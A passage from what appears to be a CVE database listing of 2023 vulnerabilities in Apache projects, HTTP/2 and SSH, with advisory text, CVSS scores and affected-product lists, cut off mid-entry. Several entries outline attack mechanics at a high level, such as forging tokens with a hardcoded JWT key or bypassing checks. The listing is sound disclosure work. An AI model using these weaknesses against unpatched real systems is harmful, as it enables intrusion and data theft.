Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') vulnerability in Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.8.0, the attacker can create misleading or false log records, making it harder to audit and trace malicious activities. Users are advised to upgrade to Apache InLong's 1.9.0 or cherry-pick [1] to solve it. [1] https://github.com/apache/inlong/pull/8628

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-43668

Authorization Bypass Through User-Controlled Key vulnerability in Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.8.0,  some sensitive params checks will be bypassed, like "autoDeserizalize","allowLoadLocalInfile".... .   Users are advised to upgrade to Apache InLong's 1.9.0 or cherry-pick [1] to solve it. [1]  https://github.com/apache/inlong/pull/8604

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-43701

Improper payload validation and an improper REST API response type, made it possible for an authenticated malicious actor to store malicious code into Chart's metadata, this code could get executed if a user specifically accesses a specific deprecated API endpoint. This issue affects Apache Superset versions prior to 2.1.2.  Users are recommended to upgrade to version 2.1.2, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7
security@apache.org 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2023-43826

Apache Guacamole 1.5.3 and older do not consistently ensure that values received from a VNC server will not result in integer overflow. If a user connects to a malicious or compromised VNC server, specially-crafted data could result in memory corruption, possibly allowing arbitrary code to be executed with the privileges of the running guacd process. Users are recommended to upgrade to version 1.5.4, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9
security@apache.org 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.6 5.9

Products Affected

Vendor Product Version
apache guacamole *
CVE-2023-44312

Exposure of Sensitive Information to an Unauthorized Actor in Apache ServiceComb Service-Center.This issue affects Apache ServiceComb Service-Center before 2.1.0 (include). Users are recommended to upgrade to version 2.2.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6
security@apache.org 5.8 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache servicecomb *
CVE-2023-44313

Server-Side Request Forgery (SSRF) vulnerability in Apache ServiceComb Service-Center. Attackers can obtain sensitive server information through specially crafted requests.This issue affects Apache ServiceComb before 2.1.0(include). Users are recommended to upgrade to version 2.2.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 7.6 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L 2.8 4.7
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache servicecomb *
CVE-2023-44483

All versions of Apache Santuario - XML Security for Java prior to 2.2.6, 2.3.4, and 3.0.3, when using the JSR 105 API, are vulnerable to an issue where a private key may be disclosed in log files when generating an XML Signature and logging with debug level is enabled. Users are recommended to upgrade to version 2.2.6, 2.3.4, or 3.0.3, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache santuario_xml_security_for_java *
CVE-2023-44487

The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
microsoft windows_10_1809 *
f5 big-ip_application_security_manager *
redhat jboss_enterprise_application_platform 6.0.0
microsoft windows_server_2022 -
cisco prime_cable_provisioning *
redhat cost_management -
cisco nx-os *
microsoft asp.net_core *
f5 big-ip_advanced_web_application_firewall 17.1.0
cisco iot_field_network_director *
redhat openshift_container_platform 4.0
linkerd linkerd 2.13.0
linecorp armeria *
linkerd linkerd 2.14.0
f5 big-ip_link_controller *
f5 big-ip_domain_name_system 17.1.0
redhat jboss_fuse 6.0.0
ietf http 2.0
f5 big-ip_ssl_orchestrator *
microsoft windows_server_2016 -
cisco ios_xe *
f5 big-ip_advanced_web_application_firewall *
f5 big-ip_fraud_protection_service *
apache tomcat *
netapp oncommand_insight -
redhat jboss_data_grid 7.0.0
f5 nginx_plus r30
projectcontour contour *
netty netty *
microsoft cbl-mariner *
openresty openresty *
redhat advanced_cluster_management_for_kubernetes 2.0
traefik traefik 3.0.0
cisco crosswork_situation_manager -
varnish_cache_project varnish_cache *
redhat openshift_developer_tools_and_services -
redhat node_healthcheck_operator -
redhat self_node_remediation_operator -
redhat ceph_storage 5.0
redhat openshift_api_for_data_protection -
microsoft windows_11_21h2 *
redhat logging_subsystem_for_red_hat_openshift -
redhat openshift_virtualization 4
f5 big-ip_global_traffic_manager 17.1.0
facebook proxygen *
redhat integration_camel_for_spring_boot -
konghq kong_gateway *
redhat openshift_serverless -
f5 big-ip_carrier-grade_nat *
redhat machine_deletion_remediation_operator -
redhat cryostat 2.0
cisco ultra_cloud_core_-_policy_control_function 2024.01.0
f5 big-ip_ddos_hybrid_defender 17.1.0
redhat migration_toolkit_for_containers -
redhat openstack_platform 16.1
cisco prime_network_registrar *
grpc grpc 1.57.0
fedoraproject fedora 37
nodejs node.js *
f5 big-ip_global_traffic_manager *
microsoft azure_kubernetes_service *
microsoft windows_server_2019 -
redhat node_maintenance_operator -
kazu-yamamoto http2 *
nghttp2 nghttp2 *
cisco crosswork_data_gateway *
redhat openshift_secondary_scheduler_operator -
microsoft .net *
redhat jboss_fuse 7.0.0
redhat fence_agents_remediation_operator -
f5 big-ip_fraud_protection_service 17.1.0
apple swiftnio_http/2 *
jenkins jenkins *
debian debian_linux 10.0
f5 big-ip_application_acceleration_manager *
f5 big-ip_advanced_firewall_manager 17.1.0
redhat certification_for_red_hat_enterprise_linux 8.0
f5 big-ip_local_traffic_manager 17.1.0
f5 big-ip_link_controller 17.1.0
apache apisix *
fedoraproject fedora 38
redhat openstack_platform 17.1
f5 big-ip_analytics *
linkerd linkerd 2.14.1
cisco ios_xr *
redhat cert-manager_operator_for_red_hat_openshift -
redhat service_telemetry_framework 1.5
f5 big-ip_policy_enforcement_manager 17.1.0
f5 big-ip_websafe 17.1.0
f5 big-ip_analytics 17.1.0
f5 big-ip_application_acceleration_manager 17.1.0
redhat satellite 6.0
cisco data_center_network_manager -
cisco unified_contact_center_domain_manager -
redhat quay 3.0.0
f5 big-ip_access_policy_manager 17.1.0
cisco ultra_cloud_core_-_session_management_function *
redhat 3scale_api_management_platform 2.0
cisco unified_attendant_console_advanced -
f5 big-ip_application_visibility_and_reporting 17.1.0
linkerd linkerd 2.13.1
redhat enterprise_linux 6.0
envoyproxy envoy 1.26.4
envoyproxy envoy 1.25.9
cisco secure_dynamic_attributes_connector *
redhat certification_for_red_hat_enterprise_linux 9.0
f5 big-ip_local_traffic_manager *
redhat openshift_gitops -
microsoft windows_10_22h2 *
redhat ansible_automation_platform 2.0
redhat build_of_optaplanner 8.0
redhat enterprise_linux 8.0
redhat integration_camel_k -
redhat advanced_cluster_security 4.0
cisco prime_access_registrar *
redhat decision_manager 7.0
linkerd linkerd *
cisco prime_infrastructure *
f5 big-ip_access_policy_manager *
cisco secure_web_appliance_firmware *
redhat web_terminal -
microsoft windows_10_1607 *
redhat jboss_a-mq 7
cisco unified_contact_center_enterprise -
envoyproxy envoy 1.27.0
redhat openshift_container_platform_assisted_installer -
redhat openshift -
apache solr *
eclipse jetty *
f5 big-ip_webaccelerator 17.1.0
cisco crosswork_zero_touch_provisioning *
traefik traefik *
f5 big-ip_webaccelerator *
redhat jboss_core_services -
apache tomcat 11.0.0
cisco connected_mobile_experiences *
microsoft visual_studio_2022 *
debian debian_linux 11.0
netapp astra_control_center -
f5 big-ip_policy_enforcement_manager *
f5 big-ip_domain_name_system *
cisco telepresence_video_communication_server *
f5 big-ip_carrier-grade_nat 17.1.0
redhat openshift_pipelines -
redhat process_automation 7.0
f5 nginx_plus *
debian debian_linux 12.0
redhat openshift_service_mesh 2.0
cisco ultra_cloud_core_-_policy_control_function *
cisco unified_contact_center_management_portal -
cisco secure_malware_analytics *
golang http2 *
apache traffic_server *
redhat openshift_distributed_tracing -
redhat build_of_quarkus -
redhat integration_service_registry -
microsoft windows_11_22h2 *
f5 nginx *
golang go *
golang networking *
cisco business_process_automation *
cisco unified_contact_center_enterprise_-_live_data_server *
akka http_server *
redhat openshift_sandboxed_containers -
f5 big-ip_application_visibility_and_reporting *
caddyserver caddy *
f5 big-ip_next_service_proxy_for_kubernetes *
f5 nginx_plus r29
envoyproxy envoy 1.24.10
amazon opensearch_data_prepper *
cisco fog_director *
f5 big-ip_websafe *
redhat migration_toolkit_for_virtualization -
redhat support_for_spring_boot -
cisco enterprise_chat_and_email -
f5 big-ip_advanced_firewall_manager *
f5 big-ip_next 20.0.1
microsoft windows_10_21h2 *
f5 big-ip_application_security_manager 17.1.0
redhat migration_toolkit_for_applications 6.0
redhat advanced_cluster_security 3.0
f5 big-ip_ddos_hybrid_defender *
istio istio *
cisco firepower_threat_defense *
redhat openshift_dev_spaces -
cisco crosswork_data_gateway 5.0
cisco expressway *
redhat single_sign-on 7.0
redhat network_observability_operator -
redhat service_interconnect 1.0
grpc grpc *
redhat run_once_duration_override_operator -
dena h2o *
redhat jboss_a-mq_streams -
redhat jboss_enterprise_application_platform 7.0.0
redhat enterprise_linux 9.0
redhat openstack_platform 16.2
f5 big-ip_ssl_orchestrator 17.1.0
cisco ultra_cloud_core_-_serving_gateway_function *
f5 nginx_ingress_controller *
redhat openshift_data_science -
CVE-2023-44981

Authorization Bypass Through User-Controlled Key vulnerability in Apache ZooKeeper. If SASL Quorum Peer authentication is enabled in ZooKeeper (quorum.auth.enableSasl=true), the authorization is done by verifying that the instance part in SASL authentication ID is listed in zoo.cfg server list. The instance part in SASL auth ID is optional and if it's missing, like 'eve@EXAMPLE.COM', the authorization check will be skipped. As a result an arbitrary endpoint could join the cluster and begin propagating counterfeit changes to the leader, essentially giving it complete read-write access to the data tree. Quorum Peer authentication is not enabled by default. Users are recommended to upgrade to version 3.9.1, 3.8.3, 3.7.2, which fixes the issue. Alternately ensure the ensemble election/quorum communication is protected by a firewall as this will mitigate the issue. See the documentation for more details on correct cluster administration.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

Products Affected

Vendor Product Version
apache zookeeper *
debian debian_linux 10.0
debian debian_linux 12.0
debian debian_linux 11.0
apache zookeeper 3.9.0
CVE-2023-45348

Apache Airflow, versions 2.7.0 and 2.7.1, is affected by a vulnerability that allows an authenticated user to retrieve sensitive configuration information when the "expose_config" option is set to "non-sensitive-only". The `expose_config` option is False by default. It is recommended to upgrade to a version that is not affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-45648

Improper Input Validation vulnerability in Apache Tomcat.Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.81 and from 8.5.0 through 8.5.93 did not correctly parse HTTP trailer headers. A specially crafted, invalid trailer header could cause Tomcat to treat a single request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy. Older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 10.1.0
apache tomcat 11.0.0
apache tomcat 9.0.0
debian debian_linux 10.0
debian debian_linux 12.0
debian debian_linux 11.0
CVE-2023-45725

Design document functions which receive a user http request object may expose authorization or session cookie headers of the user who accesses the document. These design document functions are: *   list *   show *   rewrite *   update An attacker can leak the session component using an HTML-like output, insert the session as an external resource (such as an image), or store the credential in a _local document with an "update" function. For the attack to succeed the attacker has to be able to insert the design documents into the database, then manipulate a user to access a function from that design document. Workaround: Avoid using design documents from untrusted sources which may attempt to access or manipulate request object's headers

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.7 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N 2.1 3.6

Products Affected

Vendor Product Version
apache couchdb *
CVE-2023-45757

Security vulnerability in Apache bRPC <=1.6.0 on all platforms allows attackers to inject XSS code to the builtin rpcz page. An attacker that can send http request to bRPC server with rpcz enabled can inject arbitrary XSS code to the builtin rpcz page. Solution (choose one of three): 1. upgrade to bRPC > 1.6.0, download link: https://dist.apache.org/repos/dist/release/brpc/1.6.1/ 2. If you are using an old version of bRPC and hard to upgrade, you can apply this patch:  https://github.com/apache/brpc/pull/2411 3. disable rpcz feature

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache brpc *
CVE-2023-45802

When a HTTP/2 stream was reset (RST frame) by a client, there was a time window were the request's memory resources were not reclaimed immediately. Instead, de-allocation was deferred to connection close. A client could send new requests and resets, keeping the connection busy and open and causing the memory footprint to keep on growing. On connection close, all resources were reclaimed, but the process might run out of memory before that. This was found by the reporter during testing of CVE-2023-44487 (HTTP/2 Rapid Reset Exploit) with their own test client. During "normal" HTTP/2 use, the probability to hit this bug is very low. The kept memory would not become noticeable before the connection closes or times out. Users are recommended to upgrade to version 2.4.58, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H 2.2 3.6

Products Affected

Vendor Product Version
apache http_server *
fedoraproject fedora 37
fedoraproject fedora 38
debian debian_linux 10.0
fedoraproject fedora 39
CVE-2023-46104

Uncontrolled resource consumption can be triggered by authenticated attacker that uploads a malicious ZIP to import database, dashboards or datasets.   This vulnerability exists in Apache Superset versions up to and including 2.1.2 and versions 3.0.0, 3.0.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6
security@apache.org 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6

Products Affected

Vendor Product Version
apache superset *
CVE-2023-46215

Insertion of Sensitive Information into Log File vulnerability in Apache Airflow Celery provider, Apache Airflow. Sensitive information logged as clear text when rediss, amqp, rpc protocols are used as Celery result backend Note: the vulnerability is about the information exposed in the logs not about accessing the logs. This issue affects Apache Airflow Celery provider: from 3.3.0 through 3.4.0; Apache Airflow: from 1.10.0 through 2.6.3. Users are recommended to upgrade Airflow Celery provider to version 3.4.1 and Apache Airlfow to version 2.7.0 which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache airflow *
apache airflow_celery_provider *
CVE-2023-46226

Remote Code Execution vulnerability in Apache IoTDB.This issue affects Apache IoTDB: from 1.0.0 through 1.2.2. Users are recommended to upgrade to version 1.3.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache iotdb *
CVE-2023-46227

Deserialization of Untrusted Data Vulnerability in Apache Software Foundation Apache InLong. This issue affects Apache InLong: from 1.4.0 through 1.8.0, the attacker can use \t to bypass. Users are advised to upgrade to Apache InLong's 1.9.0 or cherry-pick [1] to solve it. [1] https://github.com/apache/inlong/pull/8814

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-46279

Deserialization of Untrusted Data vulnerability in Apache Dubbo.This issue only affects Apache Dubbo 3.1.5. Users are recommended to upgrade to the latest version, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache dubbo 3.1.5
CVE-2023-46288

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Airflow.This issue affects Apache Airflow from 2.4.0 to 2.7.0. Sensitive configuration information has been exposed to authenticated users with the ability to read configuration via Airflow REST API for configuration even when the expose_config option is set to non-sensitive-only. The expose_config option is False by default. It is recommended to upgrade to a version that is not affected if you set expose_config to non-sensitive-only configuration. This is a different error than CVE-2023-45348 which allows authenticated user to retrieve individual configuration values in 2.7.* by specially crafting their request (solved in 2.7.2). Users are recommended to upgrade to version 2.7.2, which fixes the issue and additionally fixes CVE-2023-45348.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-46302

Apache Software Foundation Apache Submarine has a bug when serializing against yaml. The bug is caused by snakeyaml https://nvd.nist.gov/vuln/detail/CVE-2022-1471 . Apache Submarine uses JAXRS to define REST endpoints. In order to handle YAML requests (using application/yaml content-type), it defines a YamlEntityProvider entity provider that will process all incoming YAML requests. In order to unmarshal the request, the readFrom method is invoked, passing the entityStream containing the user-supplied data in `submarine-server/server-core/src/main/java/org/apache/submarine/server/utils/YamlUtils.java`. We have now fixed this issue in the new version by replacing to `jackson-dataformat-yaml`. This issue affects Apache Submarine: from 0.7.0 before 0.8.0. Users are recommended to upgrade to version 0.8.0, which fixes this issue. If using the version smaller than 0.8.0 and not want to upgrade, you can try cherry-pick PR https://github.com/apache/submarine/pull/1054 and rebuild the submart-server image to fix this.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache submarine *
CVE-2023-46589

Improper Input Validation vulnerability in Apache Tomcat.Tomcat from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.1.15, from 9.0.0-M1 through 9.0.82 and from 8.5.0 through 8.5.95 did not correctly parse HTTP trailer headers. A trailer header that exceeded the header size limit could cause Tomcat to treat a single request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy. Older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.0-M11 onwards, 10.1.16 onwards, 9.0.83 onwards or 8.5.96 onwards, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 11.0.0
CVE-2023-46604

The Java OpenWire protocol marshaller is vulnerable to Remote Code Execution. This vulnerability may allow a remote attacker with network access to either a Java-based OpenWire broker or client to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause either the client or the broker (respectively) to instantiate any class on the classpath. Users are recommended to upgrade both brokers and clients to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9
security@apache.org 10.0 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H 3.9 6.0

Products Affected

Vendor Product Version
netapp santricity_storage_plugin -
apache activemq *
apache activemq_legacy_openwire_module *
netapp e-series_santricity_web_services_proxy -
debian debian_linux 10.0
netapp e-series_santricity_unified_manager -
debian debian_linux 11.0
CVE-2023-46749

Apache Shiro before 1.13.0 or 2.0.0-alpha-4, may be susceptible to a path traversal attack that results in an authentication bypass when used together with path rewriting Mitigation: Update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+, or ensure `blockSemicolon` is enabled (this is the default).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache shiro 2.0.0
apache shiro *
CVE-2023-46750

URL Redirection to Untrusted Site ('Open Redirect') vulnerability when "form" authentication is used in Apache Shiro. Mitigation: Update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache shiro 2.0.0
apache shiro *
CVE-2023-46801

In Apache Linkis <= 1.5.0, data source management module, when adding Mysql data source, exists remote code execution vulnerability for java version < 1.8.0_241. The deserialization vulnerability exploited through jrmp can inject malicious files into the server and execute them. This attack requires the attacker to obtain an authorized account from Linkis before it can be carried out.  We recommend that users upgrade the java version to >= 1.8.0_241. Or users upgrade Linkis to version 1.6.0.

Products Affected

Vendor Product Version
apache linkis *
CVE-2023-46819

Missing Authentication in Apache Software Foundation Apache OFBiz when using the Solr plugin. This issue affects Apache OFBiz: before 18.12.09.  Users are recommended to upgrade to version 18.12.09

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2023-46851

Allura Discussion and Allura Forum importing does not restrict URL values specified in attachments. Project administrators can run these imports, which could cause Allura to read local files and expose them.  Exposing internal files then can lead to other exploits, like session hijacking, or remote code execution. This issue affects Apache Allura from 1.0.1 through 1.15.0. Users are recommended to upgrade to version 1.16.0, which fixes the issue.  If you are unable to upgrade, set "disable_entry_points.allura.importers = forge-tracker, forge-discussion" in your .ini config file.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.9 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N 1.2 3.6

Products Affected

Vendor Product Version
apache allura *
CVE-2023-47037

We failed to apply CVE-2023-40611 in 2.7.1 and this vulnerability was marked as fixed then.  Apache Airflow, versions before 2.7.3, is affected by a vulnerability that allows authenticated and DAG-view authorized Users to modify some DAG run detail values when submitting notes. This could have them alter details such as configuration parameters, start date, etc.  Users should upgrade to version 2.7.3 or later which has removed the vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-47248

Deserialization of untrusted data in IPC and Parquet readers in PyArrow versions 0.14.0 to 14.0.0 allows arbitrary code execution. An application is vulnerable if it reads Arrow IPC, Feather or Parquet data from untrusted sources (for example user-supplied input files). This vulnerability only affects PyArrow, not other Apache Arrow implementations or bindings. It is recommended that users of PyArrow upgrade to 14.0.1. Similarly, it is recommended that downstream libraries upgrade their dependency requirements to PyArrow 14.0.1 or later. PyPI packages are already available, and we hope that conda-forge packages will be available soon. If it is not possible to upgrade, we provide a separate package `pyarrow-hotfix` that disables the vulnerability on older PyArrow versions. See https://pypi.org/project/pyarrow-hotfix/ for instructions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache pyarrow *
CVE-2023-47265

Apache Airflow, versions 2.6.0 through 2.7.3 has a stored XSS vulnerability that allows a DAG author to add an unbounded and not-sanitized javascript in the parameter description field of the DAG. This Javascript can be executed on the client side of any of the user who looks at the tasks in the browser sandbox. While this issue does not allow to exit the browser sandbox or manipulation of the server-side data - more than the DAG author already has, it allows to modify what the user looking at the DAG details sees in the browser - which opens up all kinds of possibilities of misleading other users. Users of Apache Airflow are recommended to upgrade to version 2.8.0 or newer to mitigate the risk associated with this vulnerability

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-47804

Apache OpenOffice documents can contain links that call internal macros with arbitrary arguments. Several URI Schemes are defined for this purpose. Links can be activated by clicks, or by automatic document events. The execution of such links must be subject to user approval. In the affected versions of OpenOffice, approval for certain links is not requested; when activated, such links could therefore result in arbitrary script execution. This is a corner case of CVE-2022-47502.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache openoffice *
CVE-2023-48291

Apache Airflow, in versions prior to 2.8.0, contains a security vulnerability that allows an authenticated user with limited access to some DAGs, to craft a request that could give the user write access to various DAG resources for DAGs that the user had no access to, thus, enabling the user to clear DAGs they shouldn't. This is a missing fix for CVE-2023-42792 in Apache Airflow 2.7.2  Users of Apache Airflow are strongly advised to upgrade to version 2.8.0 or newer to mitigate the risk associated with this vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-48362

XXE in the XML Format Plugin in Apache Drill version 1.19.0 and greater allows a user to read any file on a remote file system or execute commands via a malicious XML file. Users are recommended to upgrade to version 1.21.2, which fixes this issue.

Products Affected

Vendor Product Version
apache drill *
CVE-2023-48396

Web Authentication vulnerability in Apache SeaTunnel. Since the jwt key is hardcoded in the application, an attacker can forge any token to log in any user. Attacker can get secret key in /seatunnel-server/seatunnel-app/src/main/resources/application.yml and then create a token. This issue affects Apache SeaTunnel: 1.0.0. Users are recommended to upgrade to version 1.0.1, which fixes the issue.

Products Affected

Vendor Product Version
apache seatunnel 1.0.0
CVE-2023-48795

The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before 1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, trilead-ssh2 6401, LANCOM 